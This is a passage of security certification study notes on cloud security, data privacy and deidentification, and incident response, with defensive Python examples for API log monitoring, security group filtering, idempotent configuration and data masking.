process and to identity and access management (IAM) features designed
to ensure authorized use of applications.
● Secrets Management:
○ A cloud service is highly vulnerable to remote access.

Cloud Compute Security


● The compute component provides process and system memory (RAM) resource
as required for a particular workload.
● Container Security
○ A container uses many shared components on the underlying platform,
meaning it must be carefully configured to reduce the risk of data
exposure.
● API Inspection and Integration:
○ The API is the means by which consumers interact with the cloud
infrastructure, platform, or application.
○ Monitoring API usage gives warning if the system is becoming overloaded
(ensuring availability) and allows detection of unauthorized usage or
attempted usage.
○ Number of requests—this basic load metric counts the number of requests per
second or requests per minute.
○ Latency—this is the time in milliseconds (ms) taken for the service to
respond to an API call.
○ Error rates—this measures the number of errors as a percentage of total
calls, usually classifying error types under category headings.
○ Unauthorized and suspicious endpoints—connections to the API can be
managed in the same sort of way as remote access.
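
The four API monitoring metrics above can be computed directly from an access log. This Python sketch is an added example, not part of the original notes; the log layout (timestamp, source IP, method, path, status, latency in ms), the approved client range and every sample value are constructed assumptions.

```python
import ipaddress
from collections import Counter

# Assumed range of approved API clients (hypothetical for this example).
ALLOWED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

# Constructed API access log: ts source_ip method path status latency_ms
SAMPLE_LOG = """\
2024-05-01T10:00:05Z 10.20.1.5 GET /v1/items 200 40
2024-05-01T10:00:20Z 10.20.1.5 GET /v1/items/7 200 60
2024-05-01T10:00:41Z 10.20.3.9 POST /v1/items 201 80
2024-05-01T10:00:59Z 203.0.113.50 GET /v1/admin/keys 403 20
2024-05-01T10:01:02Z 203.0.113.50 GET /v1/admin/keys 403 20
2024-05-01T10:01:03Z 203.0.113.50 GET /v1/admin/users 401 20
2024-05-01T10:01:30Z 10.20.1.5 GET /v1/items 500 900
2024-05-01T10:01:45Z 10.20.3.9 GET /v1/items 200 60
"""


def error_class(status):
    """Classify an HTTP status under a category heading, or None if not an error."""
    if status in (401, 403):
        return "auth"      # unauthorized usage or attempted usage
    if 400 <= status < 500:
        return "client"
    if status >= 500:
        return "server"
    return None


def analyze(log_text, allowed=ALLOWED_NETS):
    """Compute request counts, latency, error rate and out-of-policy sources."""
    per_minute, errors, outside = Counter(), Counter(), Counter()
    latencies = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 6:
            continue  # skip malformed lines
        ts, src, _method, _path, status, latency = fields
        per_minute[ts[:16]] += 1            # bucket by YYYY-MM-DDTHH:MM
        latencies.append(int(latency))
        cls = error_class(int(status))
        if cls:
            errors[cls] += 1
        if not any(ipaddress.ip_address(src) in net for net in allowed):
            outside[src] += 1               # endpoint outside the approved range
    total = len(latencies)
    return {
        "requests_per_minute": dict(per_minute),
        "mean_latency_ms": sum(latencies) / total if total else 0.0,
        "max_latency_ms": max(latencies, default=0),
        "error_rate_pct": 100.0 * sum(errors.values()) / total if total else 0.0,
        "errors_by_class": dict(errors),
        "unauthorized_sources": dict(outside),
    }


if __name__ == "__main__":
    for name, value in analyze(SAMPLE_LOG).items():
        print(f"{name}: {value}")
```

In the sample, the load and mean latency look unremarkable, while the error breakdown and the source check both point at one external address repeatedly probing administrative paths.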

Cloud Storage Security


● The storage component means the provisioning of persistent storage capacity.
● Permissions and Resource Policies:
○ As with on-premises systems, cloud storage resources must be configured
to allow reads and/or writes only from authorized endpoints.
● Encryption:
○ Each storage unit is encrypted using an AES key.
○ If an attacker were to physically access a data center and copy or remove
a disk, the data on the disk would not be readable.
○ With CSP-managed keys, the cloud provider handles this process by
using the access control rights configured on the storage resource to
determine whether access is approved and, if so, making the key available
to the VM or container.

High Availability
● Replication:
○ Data replication allows businesses to copy data to where it can be
utilized most effectively.
○ Data replication requires low-latency network connections, security, and
data integrity.
○ The terms hot and cold storage refer to how quickly data is retrieved.
■ Hot storage retrieves data more quickly than cold, but the quicker
the data retrieval, the higher the cost.
● High Availability across Zones:
○ The availability zones have independent data centers with their own
power, cooling, and network connectivity.
○ Local replication—replicates your data within a single data center in the
region where you created your storage account.
○ Regional replication (also called zone-redundant storage)—replicates your
data across multiple data centers within one or two regions.
○ Geo-redundant storage (GRS)—replicates your data to a secondary
region that is distant from the primary region.

Cloud Networking Security
● Virtual Private Clouds (VPCs):
○ Each customer can create one or more virtual private clouds (VPCs)
attached to their account.
○ By default, a VPC is isolated from other CSP accounts and from other
VPCs operating in the same account.
● Public and Private Subnets:
○ Each subnet within a VPC can either be private or public.
○ To configure a public subnet, first an Internet gateway (virtual router) must
be attached to the VPC configuration.
○ The Internet gateway performs 1:1 network address translation (NAT) to
route Internet communications to and from the instance.

VPCs and Transit Gateways


● Connectivity can also be configured between VPCs in the same account or with
VPCs belonging to different accounts, and between VPCs and on-premises
networks.
● Traditionally, VPCs can be interconnected using peering relationships and
connected with on-premises networks using VPN gateways.
● Essentially, a transit gateway is a virtual router that handles routing between the
subnets in each attached VPC and any attached VPN gateways.

VPC Endpoints
● A VPC endpoint is a means of publishing a service so that it is accessible by
instances in other VPCs using only the AWS internal network and private IP
addresses.
● This means that the traffic is never exposed to the Internet.
● There are two types of VPC endpoint: gateway and interface.
● Gateway Endpoints:
○ A gateway endpoint is used to connect instances in a VPC to the AWS S3
(storage) and DynamoDB (database) services.
○ A gateway endpoint is configured as a route to the service in the VPC's
route table.
● Interface Endpoints:
○ An interface endpoint makes use of AWS's PrivateLink feature to allow
private access to custom services:
■ A custom service provider VPC is configured by publishing the
service with a DNS host name.
■ A VPC endpoint interface is configured in each service consumer
VPC subnet.
■ Each instance within the VPC subnet is configured to use the
endpoint address to contact the service provider.

Cloud Firewall Security


● Firewalls work with multiple accounts, VPCs, subnets within VPCs, and instances
within subnets to enforce the segmentation required by the architectural design.

Security Groups
● In AWS, basic packet filtering rules managing traffic that each instance will
accept can be managed through security groups.
● A security group provides stateful inbound and outbound filtering at layer 4.
○ The stateful filtering property means that it will allow established and
related traffic if a new connection has been accepted.
● There are no deny rules for security groups; any traffic that does not match an
allow rule is dropped.
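
The two properties above (stateful filtering, and allow rules only with an implicit drop) can be seen in a small model. This Python sketch is an added example, not part of the original notes and not AWS code; the Rule and SecurityGroup classes, the flow key and all addresses are assumptions made for illustration.

```python
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    """An allow rule: protocol, port range, and peer address range."""
    protocol: str
    port_from: int
    port_to: int
    cidr: str

    def matches(self, protocol, port, peer_ip):
        return (protocol == self.protocol
                and self.port_from <= port <= self.port_to
                and ipaddress.ip_address(peer_ip) in ipaddress.ip_network(self.cidr))


class SecurityGroup:
    """Simplified layer 4 filter: allow rules only, default drop, stateful."""

    def __init__(self, inbound=(), outbound=()):
        self.inbound = list(inbound)
        self.outbound = list(outbound)
        self._tracked = set()   # flows accepted earlier (connection tracking)

    def packet(self, direction, protocol, local_port, peer_ip, peer_port):
        """Return True if the packet is accepted, False if it is dropped."""
        flow = (protocol, local_port, peer_ip, peer_port)
        if flow in self._tracked:
            return True         # established traffic: no rule lookup needed
        if direction == "in":
            rules, port = self.inbound, local_port    # match the service port
        else:
            rules, port = self.outbound, peer_port    # match the remote port
        if any(r.matches(protocol, port, peer_ip) for r in rules):
            self._tracked.add(flow)
            return True
        return False            # there is no deny rule: no match means drop


if __name__ == "__main__":
    # Web server group: HTTPS allowed in from anywhere, no outbound rules.
    web = SecurityGroup(inbound=[Rule("tcp", 443, 443, "0.0.0.0/0")])
    print(web.packet("in", "tcp", 443, "198.51.100.10", 50000))   # accepted
    print(web.packet("out", "tcp", 443, "198.51.100.10", 50000))  # reply accepted
    print(web.packet("out", "tcp", 40000, "203.0.113.5", 443))    # new outbound dropped
    print(web.packet("in", "tcp", 22, "198.51.100.10", 50001))    # SSH dropped
```

The reply leaves the web server even though the group has no outbound rule, because the inbound connection was already accepted; a new outbound connection from the same instance is dropped.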

Cloud Access Security Brokers


● A cloud access security broker (CASB) is enterprise management software
designed to mediate access to cloud services by users across all types of
devices.
● Some of the functions of a CASB are:
○ Enable single sign-on authentication and enforce access controls and
authorizations from the enterprise network to the cloud provider.
○ Scan for malware and rogue or non-compliant device access.
○ Monitor and audit user and resource activity.
○ Mitigate data exfiltration by preventing access to unauthorized cloud
services from managed devices.
● In general, CASBs are implemented in one of three ways:
○ Forward proxy—this is a security appliance or host positioned at the client
network edge that forwards user traffic to the cloud network if the contents
of that traffic comply with policy.
○ Reverse proxy—this is positioned at the cloud network edge and directs
traffic to cloud services if the contents of that traffic comply with policy.

Services Integration and Microservices


● Service-Oriented Architecture (SOA):
○ Conceives of atomic services closely mapped to business workflows.
○ Each service takes defined inputs and produces defined outputs.
○ The key features of a service function are that it is self-contained, does not
rely on the state of other services, and exposes clear input/output (I/O)
interfaces.
● Microservices:
○ A software architecture where components of the solution are conceived
as highly decoupled services not dependent on a single platform type or
technology.
● Services Integration and Orchestration:
○ Orchestration: The automation of multiple steps in a deployment process.
○ For orchestration to work properly, automated steps must occur in the
right sequence, taking dependencies into account; it must provide the right
security credentials at every step along the way; and it must have the
rights and permissions to perform the defined tasks.

Application Programming Interfaces
● There are two predominant "styles" for creating web application APIs:
○ Simple Object Access Protocol (SOAP)—uses XML format messaging
and has a number of extensions in the form of Web Services (WS)
standards that support common features, such as authentication, transport
security, and asynchronous messaging. SOAP also has built-in error
handling.
○ Representational State Transfer (REST)—where SOAP is a tightly
specified protocol, REST is a looser architectural framework, also referred
to as RESTful APIs.
■ Where a SOAP request must be sent as a correctly formatted XML
document, a REST request can be submitted as an HTTP
operation/verb (GET or POST for example). Each resource or
endpoint in the API, expressed as a noun, should be accessed via
a single URL.

Serverless Architecture
● Serverless is a modern design pattern for service delivery. It is strongly
associated with modern web applications—most notably Netflix.
● With serverless, all the architecture is hosted within a cloud, but unlike
"traditional" virtual private cloud (VPC) offerings, services such as authentication,
web applications, and communications aren't developed and managed as
applications running on VM instances located within the cloud.
● The serverless paradigm eliminates the need to manage physical or virtual
server instances, so there is no management effort for software and patches,
administration privileges, or file system security monitoring.

Infrastructure as Code
● A provisioning architecture in which deployment of resources is performed by
scripted automation and orchestration.
● One of the goals of IaC is to eliminate snowflake systems.
○ A snowflake is a configuration or build that is different from any other.
○ The lack of consistency—or drift—in the platform environment leads to
security issues, such as patches that have not been installed, and stability
issues, such as scripts that fail to run because of some small configuration
difference.
● Idempotence: In an IaC architecture, the property that an automation or
orchestration action always produces the same result, regardless of the
component's previous state.
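
Idempotence and drift can be shown with two "snowflake" hosts whose configuration files differ. This Python sketch is an added example, not part of the original notes; the "key value" file format, the setting names, the host contents and all function names are constructed assumptions. It contrasts a non-idempotent "append a line" action with an idempotent "ensure this setting" action.

```python
# Desired state for the managed settings (hypothetical values).
DESIRED = {"PermitRootLogin": "no", "PasswordAuthentication": "no"}

# Two constructed hosts that have drifted in different ways.
HOST_A = ["Port 22", "PermitRootLogin yes", "PasswordAuthentication yes"]
HOST_B = ["Port 22", "PasswordAuthentication no", "PasswordAuthentication yes"]


def append_setting(lines, key, value):
    """Non-idempotent: every run adds another line, whatever is already there."""
    return lines + [f"{key} {value}"]


def ensure_setting(lines, key, value):
    """Idempotent: leave exactly one line for `key`, holding `value`.

    Returns (new_lines, changed). The input list is not modified.
    """
    wanted = f"{key} {value}"
    out, seen = [], False
    for line in lines:
        parts = line.split(None, 1)
        if parts and parts[0] == key:
            if not seen:
                out.append(wanted)   # rewrite the first occurrence in place
                seen = True
            continue                 # drop duplicates and conflicting values
        out.append(line)
    if not seen:
        out.append(wanted)
    return out, out != lines


def apply(lines, desired):
    """Apply every desired setting; return (new_lines, number_of_changes)."""
    changes = 0
    for key, value in desired.items():
        lines, changed = ensure_setting(lines, key, value)
        changes += changed
    return lines, changes


def drift(lines, desired):
    """Report managed keys whose values differ from the desired state.

    Maps each drifted key to the sorted list of values actually present
    (an empty list means the setting is missing).
    """
    found = {}
    for line in lines:
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] in desired:
            found.setdefault(parts[0], set()).add(parts[1].strip())
    return {k: sorted(found.get(k, set()))
            for k, v in desired.items() if found.get(k) != {v}}


if __name__ == "__main__":
    for name, host in (("A", HOST_A), ("B", HOST_B)):
        print(name, "drift before:", drift(host, DESIRED))
        fixed, n = apply(host, DESIRED)
        print(name, "changes on first run:", n, "on second run:", apply(fixed, DESIRED)[1])
        print(name, "drift after:", drift(fixed, DESIRED))
```

Both hosts end with the same managed settings and a second run changes nothing, while running the append action twice leaves conflicting duplicate lines behind.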

Software-Defined Networking
● In this model, network functions can be divided into three "planes":
○ Control plane—makes decisions about how traffic should be prioritized
and secured, and where it should be switched.
○ Data plane—handles the actual switching and routing of traffic and
imposition of security access controls.
○ Management plane—monitors traffic conditions and network status.
● A software-defined networking (SDN) application can be used to define policy
decisions on the control plane.
○ These decisions are then implemented on the data plane by a network
controller application, which interfaces with the network devices using
APIs.
○ The interface between the SDN applications and the SDN controller is
described as the "northbound" API, while that between the controller and
appliances is the "southbound" API.

Software-Defined Visibility
● APIs for reporting configuration and state data for automated monitoring and
alerting.
● Visibility is the near real-time collection, aggregation, and reporting of data about
network traffic flows and the configuration and status of all the hosts,
applications, and user accounts participating in it.

Fog and Edge Computing
● However, a very large and increasing amount of cloud data processing takes
place with data generated by Internet of Things (IoT) devices and sensors.
● Fog Computing: Provisioning processing resource between the network edge of
IoT devices and the data center to reduce latency.
● Edge computing is a broader concept partially developed from fog computing
and partially evolved in parallel to it.
● Edge computing uses the following concepts:
○ Edge devices are those that collect and depend upon data for their
operation.
■ For example, a thermometer in an HVAC system collects
temperature data; the controller in an HVAC system activates the
electromechanical components to turn the heating or air
conditioning on or off in response to ambient temperature changes.
○ Edge gateways perform some pre-processing of data to and from edge
devices to enable prioritization.

Lesson 16: Explaining Data Privacy and Protection Concepts

Privacy and Sensitive Data Concepts


● Privacy versus Security:
○ Privacy is a data governance requirement that arises when collecting and
processing personal data.
○ Privacy requires policies to identify private data, ensure that storage,
processing, and retention is compliant with relevant regulations, limit
access to the private data to authorized persons only, and ensure the
rights of data subjects to review and remove any information held about
them are met.
● Information Life Cycle Management:
○ Creation/collection—data may be generated by an employee or
automated system, or it may be submitted by a customer or supplier. At
this stage, the data needs to be classified and tagged.
○ Distribution/use—data is made available on a need-to-know basis for
authorized uses by authenticated account holders and third parties.
○ Retention—for regulatory reasons, data might have to be kept in an
archive past the date when it is still used.
○ Disposal—when it no longer needs to be used or retained, media storing
data assets must be sanitized to remove any remnants.

Data Roles and Responsibilities


● Data Governance: The overall management of the availability, usability, and
security of the information used in an organization.
● There are important institutional governance roles for oversight and management
of information assets within the life cycle:
○ Data owner—a senior (executive) role with ultimate responsibility for
maintaining the confidentiality, integrity, and availability of the information
asset.
○ Data steward—this role is primarily responsible for data quality.
■ This involves tasks such as ensuring data is labeled and identified
with appropriate metadata and that data is collected and stored in a
format and with values that comply with applicable laws and
regulations.
○ Data custodian—this role handles managing the system on which the
data assets are stored.
○ Data Privacy Officer (DPO)—this role is responsible for oversight of any
personally identifiable information (PII) assets managed by the company.
● In the context of legislation and regulations protecting personal privacy, the
following two institutional roles are important:
○ Data controller—the entity responsible for determining why and how data
is stored, collected, and used and for ensuring that these purposes and
means are lawful.
○ Data processor—an entity engaged by the data controller to assist with
technical collection, storage, or analysis tasks.

Data Classifications
● Data classification and typing schemas tag data assets so that they can be
managed through the information life cycle.
● Many data classification schemas are based on the degree of confidentiality
required:
○ Public (unclassified)—there are no restrictions on viewing the data.
■ Public information presents no risk to an organization if it is
disclosed but does present a risk if it is modified or not available.
○ Confidential (secret)—the information is highly sensitive, for viewing only
by approved persons within the owner organization, and possibly by
trusted third parties under NDA.
○ Critical (top secret)—the information is too valuable to allow any risk of its
capture. Viewing is severely restricted.
● Another type of classification schema identifies the kind of information asset:
○ Proprietary—proprietary information or intellectual property (IP) is
information created and owned by the company, typically about the
products or services that they make or perform.
○ Private/personal data—information that relates to an individual identity.
○ Sensitive—This label is typically used in the context of personal data in
which privacy-sensitive information about a subject could harm them if
made public and could prejudice decisions made about the subject.

Data Types
● Personally Identifiable Information (PII):
○ Personally identifiable information (PII) is data that can be used to
identify, contact, or locate an individual.
○ A Social Security Number (SSN) is a good example of PII.
○ Some types of information may be PII depending on the context.
■ For example, when someone browses the web using a static IP
address, the IP address is PII.
● Customer Data:
○ Customer data can be institutional information, but also personal
information about the customer's employees, such as sales and technical
support contacts.
○ Institutional information might be shared under a nondisclosure agreement
(NDA), placing contractual obligations on storing and processing it
securely.
● Health Information:
○ Personal health information (PHI)—or protected health information—
refers to medical and insurance records, plus associated hospital and
laboratory test results.
● Financial Information:
○ Financial information refers to data held about bank and investment
accounts, plus information such as payroll and tax returns.

Privacy Notices and Data Retention


● Privacy Notices:
○ Informed consent means that the data must be collected and processed
only for the stated purpose, and that purpose must be clearly described to
the user in plain language, not legalese.
○ Data collected under that consent statement cannot then be used for any
other purpose.
○ Purpose Limitation: In data protection, the principle that personal
information can be collected and processed only for a stated purpose to
which the subject has consented.
● Impact Assessments:
○ A data protection impact assessment is a process designed to identify the
risks of collecting and processing personal data in the context of a
business workflow or project and to identify mechanisms that mitigate
those risks.
● Data Retention:
○ Data retention refers to backing up and archiving information assets in
order to comply with business policies and/or applicable laws and
regulations.

Data Sovereignty and Geographical Considerations


● Data Sovereignty:
○ Data sovereignty refers to a jurisdiction preventing or restricting
processing and storage from taking place on systems which do not
physically reside within that jurisdiction.
● Geographical Considerations:
○ Geographic access requirements fall into two different scenarios:
■ Storage locations might have to be carefully selected to mitigate
data sovereignty issues. Most cloud providers allow choice of data
centers for processing and storage, ensuring that information is not
illegally transferred from a particular privacy jurisdiction without
consent.
■ Employees needing access from multiple geographic locations.
Cloud-based file and database services can apply constraint-based
access controls to validate the user's geographic location before
authorizing access.

Privacy Breaches and Data Breaches


● A data breach occurs when information is read, modified, or deleted without
authorization.
● Escalation:
○ Any breach of personal data and most breaches of IP should be
escalated to senior decision-makers and any impacts from legislation and
regulation properly considered.

Data Sharing and Privacy Terms of Agreement


● Service level agreement (SLA)—a contractual agreement setting out the detailed
terms under which a service is provided.
● Interconnection security agreement (ISA)—ISAs are defined by NIST's
SP800-47 "Managing the Security of Information Exchanges".
○ Any federal agency interconnecting its IT system to a third party must
create an ISA to govern the relationship.
● Nondisclosure agreement (NDA)—legal basis for protecting information assets.
● Data sharing and use agreement—under privacy regulations such as GDPR or
HIPAA, personal data can only be collected for a specific purpose.

Data Protection
● Data at rest—this state means that the data is in some sort of persistent storage
media.
○ In this state, it is usually possible to encrypt the data, using techniques
such as whole disk encryption, database encryption, and file- or folder-
level encryption.
● Data in transit (or data in motion)—this is the state when data is transmitted
over a network.
○ In this state, data can be protected by a transport encryption protocol,
such as TLS or IPSec.
● Data in use (or data in processing)—this is the state when data is present in
volatile memory, such as system RAM or CPU registers and cache.
○ However, trusted execution environment (TEE) mechanisms, such as Intel
Software Guard Extensions, are able to encrypt data as it exists in
memory, so that an untrusted process cannot decode the information.

Data Exfiltration
● Unauthorized copying or retrieval of data from a system is referred to as data
exfiltration.
● Data exfiltration can take place via a wide variety of mechanisms, including:
○ Copying the data to removable media or other device with storage, such
as USB drive, the memory card in a digital camera, or a smartphone.
○ Using a network protocol, such as HTTP, FTP, SSH, email, or Instant
Messaging (IM)/chat.
■ A sophisticated adversary might use a Remote Access Trojan
(RAT) to perform transfer of data over a nonstandard network port
or a packet crafter to transfer data over a standard port in a
nonstandard way.
○ By communicating it orally over a telephone, cell phone, or Voice over IP
(VoIP) network. Cell phone text messaging is another possibility.
○ Using a picture or video of the data—if text information is converted to an
image format it is very difficult for a computer-based detection system to
identify the original information from the image data.

Data Loss Prevention


● Data loss prevention (DLP) products automate the discovery and classification
of data types and enforce rules so that data is not viewed or transferred without
proper authorization.
● Such solutions will usually consist of the following components:
○ Policy server—to configure classification, confidentiality, and privacy rules
and policies, log incidents, and compile reports.
○ Endpoint agents—to enforce policy on client computers, even when they
are not connected to the network.
○ Network agents—to scan communications at network borders and
interface with web and messaging servers to enforce policy.
● A file cracking process is applied to unstructured data to render it in a consistent
scannable format.
○ The transfer of content to removable media, such as USB devices, or by
email, instant messaging, or even social media, can then be blocked if it
does not conform to a predefined policy.
● Remediation is the action the DLP software takes when it detects a policy
violation.
● The following remediation mechanisms are typical:
○ Alert only—the copying is allowed, but the management system records
an incident and may alert an administrator.
○ Block—the user is prevented from copying the original file but retains
access to it. The user may or may not be alerted to the policy violation, but
it will be logged as an incident by the management engine.
○ Quarantine—access to the original file is denied to the user (or possibly
any user). This might be accomplished by encrypting the file in place or by
moving it to a quarantine area in the file system.
○ Tombstone—the original file is quarantined and replaced with one
describing the policy violation and how the user can release it again.

Rights Management Services


● Microsoft provides an Information Rights Management (IRM) feature in their
Office productivity suite, SharePoint document collaboration services, and
Exchange messaging server.
● IRM works with the Active Directory Rights Management Services (RMS) or the
cloud-based Azure Information Protection.
● These technologies provide administrators with the following functionality:
○ Assign file permissions for different document roles, such as author,
editor, or reviewer.
○ Restrict printing and forwarding of documents, even when sent as file
attachments.
○ Restrict printing and forwarding of email messages.

Privacy Enhancing Technologies
● Data minimization is the principle that data should only be processed and
stored if that is necessary to perform the purpose for which it is collected.
● It is necessary to track how long a data point has been stored since it was
collected and whether continued retention supports a legitimate processing
function.
● Deidentification: In data protection, methods and technologies that remove
identifying information from data before it is distributed.
○ Deidentification methods may also be used where personal data is
collected to perform a transaction but does not need to be retained
thereafter.
■ For example, a company uses a customer's credit card number to
take payment for an order. When storing the order details, it only
keeps the final 4 digits of the card as part of the transaction log,
rather than the full card number.
● Pseudo-anonymization: Modifying or replacing identifying personal information in
a data set so that reidentification depends on an alternate data source.

Database Deidentification Methods


● Data Masking:
○ Data masking can mean that all or part of the contents of a field are
redacted, by substituting all character strings with "x" for example.
○ For example, in a telephone number, the dialing prefix might be retained,
but the subscriber number redacted.
● Tokenization:
○ Tokenization means that all or part of data in a field is replaced with a
randomly generated token.
○ An authorized query or app can retrieve the original value from the token
vault (the separate store that maps each token to its original value), if
necessary, so tokenization is a reversible technique.
● Aggregation/Banding:
○ Another deidentification technique is to generalize the data, such as
substituting a specific age with a broader age band.
● Hashing and Salting:
○ A cryptographic hash produces a fixed-length string from arbitrary-length
plaintext data using an algorithm such as SHA.
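
The methods listed above, applied to one record, as an added example that is not part of the original notes. The field names, the sample values, and the in-memory TokenVault class are assumptions made for illustration.

```python
import hashlib
import secrets


def mask_phone(number, keep_digits=3):
    """Data masking: keep the dialing prefix, redact the subscriber number."""
    seen, out = 0, []
    for ch in number:
        if ch.isdigit():
            seen += 1
            out.append(ch if seen <= keep_digits else "x")
        else:
            out.append(ch)  # separators stay so the field keeps its shape
    return "".join(out)


def card_last_four(card_number):
    """Retain only the final 4 digits of a card number for the order log."""
    digits = [ch for ch in card_number if ch.isdigit()]
    return "".join(digits[-4:])


def age_band(age, width=10):
    """Aggregation/banding: replace an exact age with a broader band."""
    low = (age // width) * width
    return f"{low}-{low + width - 1}"


def salted_hash(value, salt):
    """Hashing and salting: fixed-length SHA-256 digest of salt + value."""
    return hashlib.sha256(salt + value.encode("utf-8")).hexdigest()


class TokenVault:
    """Tokenization: random tokens; the token-to-value map lives only here."""

    def __init__(self):
        self._value_by_token = {}
        self._token_by_value = {}

    def tokenize(self, value):
        if value not in self._token_by_value:
            token = "tok_" + secrets.token_hex(8)  # random, not derived from value
            self._token_by_value[value] = token
            self._value_by_token[token] = value
        return self._token_by_value[value]

    def detokenize(self, token, authorized):
        # Reversal is the privileged operation, so it is gated explicitly.
        if not authorized:
            raise PermissionError("caller is not authorized to reverse tokens")
        return self._value_by_token[token]


def deidentify(record, vault, salt):
    """Apply one method per field and return the record that can be shared."""
    return {
        "customer": vault.tokenize(record["customer"]),
        "email_hash": salted_hash(record["email"].lower(), salt),
        "phone": mask_phone(record["phone"]),
        "card": card_last_four(record["card"]),
        "age": age_band(record["age"]),
    }


# Constructed sample record; none of these values come from the notes.
SAMPLE = {
    "customer": "Jane Example",
    "email": "Jane@example.com",
    "phone": "555-867-5309",
    "card": "4111 1111 1111 1111",
    "age": 37,
}

if __name__ == "__main__":
    print(deidentify(SAMPLE, TokenVault(), salt=secrets.token_bytes(16)))
```

Only the token can be reversed, and only through the vault; the masked, banded, and hashed fields cannot be turned back into the original values from the output alone.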

Lesson 17: Performing Incident Response

Incident Response Process


● Incident response policy sets the resources, processes, and guidelines for
dealing with security incidents.
● Incident response follows a well-structured process, such as that set out in the
NIST Computer Security Incident Handling Guide special publication.
● The following are the principal stages in an incident response life cycle:
○ 1. Preparation—make the system resilient to attack in the first place.
■ This includes hardening systems, writing policies and procedures,
and setting up confidential lines of communication.
○ 2. Identification—from the information in an alert or report, determine
whether an incident has taken place, assess how severe it might be
(triage), and notify stakeholders.
○ 3. Containment—limit the scope and magnitude of the incident.
■ The principal aim of incident response is to secure data while
limiting the immediate impact on customers and business partners.
○ 4. Eradication—once the incident is contained, remove the cause and
restore the affected system to a secure state by wiping a system and
applying secure configuration settings.
○ 5. Recovery—with the cause of the incident eradicated, the system can be
reintegrated into the business process that it supports.
■ Applying patches and updates to a system to help prevent future
incidents is important as well.
○ 6. Lessons learned—analyze the incident and responses to identify
whether procedures or systems could be improved.

Cyber Incident Response Team


● In order to identify and manage incidents, you should develop some method of
reporting, categorizing, and prioritizing them (triage), in the same way that
troubleshooting support incidents can be logged and managed.
● Large organizations will provide a dedicated team as a single point-of-contact for
the notification of security incidents.
○ This team is variously described as a cyber incident response team
(CIRT), computer security incident response team (CSIRT), or computer
emergency response team (CERT).

Communications Plan and Stakeholder Management


● Call List: A document listing authorized contacts for notification and collaboration
during a security incident.
● For file and data exchange, there should be a messaging system with end-to-end
encryption, such as Off-the-Record (OTR), Signal, or WhatsApp, or an external
email system with message encryption (S/MIME or PGP).

Incident Response Plan


● An incident response plan (IRP) lists the procedures, contacts, and resources
available to responders for various incident categories.
● A playbook (or runbook) is a data-driven standard operating procedure (SOP) to
assist junior analysts in detecting and responding to specific cyberthreat
scenarios, such as phishing attempts, SQL injection data exfiltration, connection
to a block-listed IP range, and so on.
● One challenge in incident management is to allocate resources efficiently.
○ Data integrity—the most important factor in prioritizing incidents will often
be the value of data that is at risk.
○ Downtime—another very important factor is the degree to which an
incident disrupts business processes.
○ Economic/publicity—both data integrity and downtime will have important
economic effects, both in the short term and the long term.
○ Scope—the scope of an incident (broadly the number of systems affected)
is not a direct indicator of priority.
○ Detection time—research has shown that the existence of more than half
of data breaches is not detected for weeks or months after the intrusion
occurs, while in a successful intrusion, data is typically breached within
minutes.
○ Recovery time—some incidents require lengthy remediation as the system
changes required are complex to implement.

Cyber Kill Chain Attack Framework


● A key tool for threat research is a framework to use to describe the stages of an
attack.
○ These stages are often referred to as a cyber kill chain, following the
influential white paper Intelligence-Driven Computer Network Defense
commissioned by Lockheed Martin.
● 1. Reconnaissance—in this stage the attacker determines what methods to use
to complete the phases of the attack and gathers information about the target's
personnel, computer systems, and supply chain.
● 2. Weaponization—the attacker couples payload code that will enable access
with exploit code that will use a vulnerability to execute on the target system.
● 3. Delivery—the attacker identifies a vector by which to transmit the weaponized
code to the target environment, such as via an email attachment or on a USB
drive.
● 4. Exploitation—the weaponized code is executed on the target system by this
mechanism. For example, a phishing email may trick the user into running the
code, while a drive-by-download would execute on a vulnerable system without
user intervention.
● 5. Installation—this mechanism enables the weaponized code to run a remote
access tool and achieve persistence on the target system.
● 6. Command and control (C2 or C&C)—the weaponized code establishes an
outbound channel to a remote server that can then be used to control the remote
access tool and possibly download additional tools to progress the attack.
● 7. Actions on objectives—in this phase, the attacker typically uses the access
achieved to covertly collect information from target systems and transfer it to a
remote system (data exfiltration). An attacker may have other goals or motives,
however.

Other Attack Frameworks


● MITRE ATT&CK:
○ A knowledge base maintained by the MITRE Corporation for listing and
explaining specific adversary tactics, techniques, and procedures.
○ It tags each technique with a unique ID and places it in one or more tactic
categories, such as initial access, persistence, lateral movement, or
command and control.
● The Diamond Model of Intrusion Analysis:
○ The Diamond Model of Intrusion Analysis suggests a framework to
analyze an intrusion event (E) by exploring the relationships between four
core features: adversary, capability, infrastructure, and victim.


Incident Response Exercises
● Training on specific incident response scenarios can use three forms:
○ Tabletop—this is the least costly type of training. The facilitator presents a
scenario and the responders explain what action they would take to
identify, contain, and eradicate the threat.
○ Walkthroughs—in this model, a facilitator presents the scenario as for a
tabletop exercise, but the incident responders demonstrate what actions
they would take in response.
○ Simulations—a simulation is a team-based exercise, where the red team
attempts an intrusion, the blue team operates response and recovery
controls, and a white team moderates and evaluates the exercise.

Incident Response, Disaster Recovery, and Retention Policy


● You should distinguish specific incident response planning from other types of
planning for disaster recovery and business continuity:
○ Disaster recovery plan—a disaster can be seen as a special class of
incident where the organization's primary business function is disrupted.
■ Disaster recovery requires considerable resources, such as shifting
processing to a secondary site. Disaster recovery will involve a
wider range of stakeholders than less serious incidents.
○ Business continuity plan (BCP)—this identifies how business processes
should deal with both minor and disaster-level disruption.
■ Continuity planning ensures that there is processing redundancy
supporting the workflow, so that when a server is taken offline for
security remediation, processing can failover to a separate system.
○ Continuity of Operation Planning (COOP)—this terminology is used for
government facilities, but is functionally similar to business continuity
planning.
● Retention Policy: Dictates for how long information needs to be kept available on
backup and archive systems. This may be subject to legislative requirements.

Incident Identification
● There are multiple channels by which events or precursors may be recorded:
○ Using log files, error messages, IDS alerts, firewall alerts, and other
resources to establish baselines and identify those parameters that
indicate a possible security incident.
○ Comparing deviations to established metrics to recognize incidents and
their scopes.
○ Manual or physical inspections of site, premises, networks, and hosts.
○ Notification by an employee, customer, or supplier.
○ Public reporting of new vulnerabilities or threats by a system vendor,
regulator, the media, or other outside party.
● First Responder:
○ The first experienced person or team to arrive at the scene of an incident.
● Analysis and Incident Identification:
○ Analysis will depend on identifying the type of incident and the data or
resources affected (its scope and impact).
○ At this point, the incident management database should have a record of
the event indicators, the nature of the incident, its impact, and the incident
investigator responsible.

Security Information and Event Management


